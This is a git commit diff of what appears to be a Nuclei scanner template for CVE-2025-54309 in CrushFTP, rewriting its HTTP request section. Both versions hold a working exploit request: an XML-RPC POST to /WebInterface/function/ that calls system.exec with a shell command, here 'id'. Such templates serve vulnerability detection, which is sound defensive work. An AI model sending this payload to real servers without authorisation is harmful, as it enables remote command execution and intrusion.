Update CVE-2025-54309.yaml

Co-authored-by: Chris <95527687+darses@users.noreply.github.com>
2026-01-31 15:53:33 +08:00 · 2025-07-27 23:37:35 +05:30
parent 0d621a094b
commit 7ab25befca
1 changed files with 19 additions and 19 deletions
--- a/CVE-2025-54309.yaml
+++ b/CVE-2025-54309.yaml
@@ -48,25 +48,25 @@ variables:
  cmd: "id"

 http:
-  - raw:
-      - |
-        POST /WebInterface/function/ HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: CrushExploit/2.0
-        Accept: */*
-        Content-Type: application/xml
-
-        <?xml version="1.0"?>
-        <methodCall>
-          <methodName>system.exec</methodName>
-          <params>
-            <param>
-              <value>
-                <string>{{cmd}}</string>
-              </value>
-            </param>
-          </params>
-        </methodCall>
+  - method: POST
+    path:
+      - "{{BaseURL}}/WebInterface/function/"
+    
+    headers:
+      Content-Type: application/xml
+    
+    body: |
+      <?xml version="1.0"?>
+      <methodCall>
+        <methodName>system.exec</methodName>
+        <params>
+          <param>
+            <value>
+              <string>{{cmd}}</string>
+            </value>
+          </param>
+        </params>
+      </methodCall>

    matchers-condition: and
    matchers: